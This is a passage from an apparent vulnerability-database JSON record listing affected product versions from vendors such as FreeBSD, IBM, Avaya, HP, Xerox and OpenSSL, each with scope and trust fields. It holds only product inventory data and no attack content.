"eq", "trust": 0.3, "vendor": "freebsd", "version": "3.4" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "workcentre", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "5755061.132.224.35203" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.2" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "security analytics platform", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "7.1.4" }, { "model": "8.4-beta1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.3" }, { "model": "project openssl 0.9.8zb", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl beta3", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "cloudbridge", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7225072.030.134.32804" }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x31002582" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1" }, { "model": "gpfs for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3" }, { "model": "version control repository manager", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "6.0-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.1.5" }, { "model": "9.2-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.4" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.0" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "58450" }, { "model": "sterling connect:direct for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "10.0-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1.6" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "5845072.060.134.32804" }, { "model": "8.4-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.2.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1x" }, { "model": "9.3-release-p1", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "data ontap smi-s agent", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.6" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2" }, { "model": "8.4-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "8.1-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "cacheflow", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "2.0" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.5" }, { "model": "tssc", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.3.16" }, { "model": "workcentre", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "5740061.132.224.35203" }, { "model": "-release-p14", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "57450" }, { "model": "8.1-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.5" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "5" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.0" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1.7.1" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "87000" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.913" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "9.1-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "beta4", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.0.1" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.4" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "system m5 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x310054570" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "insight control server provisioning", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "9.0-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "icewall sso agent option update rele", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.02007" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.1" }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x35307160" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "-release-p5", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.0" }, { "model": "9.2-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "insight control", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3.1" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.6.1" }, { "model": "7.2-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.5" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1.0.9" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "sterling connect:direct for hp nonstop", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.4" }, { "model": "-stablepre050201", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5" }, { "model": "server migration pack", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "flex system fc5022 16gb san scalable switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.3.1" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.7" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "project openssl 1.0.0h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "insight control", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5" }, { "model": "9.2-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "websphere datapower soa appliance", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.02" }, { "model": "7.3-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "flashsystem", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8400" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "36550" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.4" }, { "model": "release p7", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.3--" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1" }, { "model": "aura experience portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "icewall sso dfw r3", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" }, { "model": "5.4-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "sterling b2b integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "workcentre spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7535061.121.225.06100" }, { "model": "release-p5", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.1" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "9.1-release-p14", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.1-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "virtual connect enterprise manager sdk", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.8" }, { "model": "-release-p10", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "aura system manager sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x357087180" }, { "model": "project openssl 0.9.8o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "66550" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "websphere datapower soa appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.0.14" }, { "model": "9.3-beta1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "x-series xos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "9.6" }, { "model": "proxysg sgos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.5.6.2" }, { "model": "cms r17ac.g", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "aura system platform sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "78550" }, { "model": "idatplex dx360 m4 water cooled type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79190" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.0" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.3" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "sterling connect:direct for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3950x638370" }, { "model": "10.0-rc1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.0" }, { "model": "aura system platform sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.7" }, { "model": "qradar siem", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.9" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "57400" }, { "model": "websphere mq advanced message security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "-8.0.0.0" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "10.0-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "hp-ux b.11.31 (11i", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "v3)" }, { "model": "9.0-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "sterling b2b integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2408956" }, { "model": "flex system manager node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8731" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.4" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "93010" }, { "model": "websphere datapower soa appliance", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.0.0.17" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.2" }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.3.1" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x8807903" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "icewall mcrp", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1" }, { "model": "-release-p8", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.10" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.2" }, { "model": "9.2-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "8.4-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "snapdrive for unix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "system m4 hd", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x36305466" }, { "model": "project openssl 0.9.8s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "-release-p17", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.7" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "7.0-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "sterling connect:direct for hp nonstop", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.6" }, { "model": "9.1-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7845072.040.134.32804" }, { "model": "qradar risk manager mr2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "proxysg sgos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.0.9.8" }, { "model": "rc1", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "workcentre spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7545061.121.225.06100" }, { "model": "10.0-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x4407917" }, { "model": "flashsystem", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v8400" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "system m4 hd", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x36505460" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x357087220" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.1" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "flex system manager node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8734" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "netscaler service delivery appliance", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.10" }, { "model": "-stablepre122300", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5" }, { "model": "matrix operating environment", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.1" }, { "model": "storage server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "2.1" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "79700" }, { "model": "websphere datapower soa appliance", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.0.1.5" }, { "model": "proventia network security controller 1.0.3350m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.4" }, { "model": "9.1-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.0" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7970072.200.134.32804" }, { "model": "-prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.8" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "75350" }, { "model": "cloudsystem matrix", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7220072.030.134.32804" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.1.1" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "cms r17ac.h", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.0" }, { "model": "colorqube r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "9303072.180.134.32804" }, { "model": "enterprise linux desktop workstation client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "workcentre", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "5735061.132.224.35203" }, { "model": "flex system fc5022 16gb san scalable switch 7.2.0d5", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": 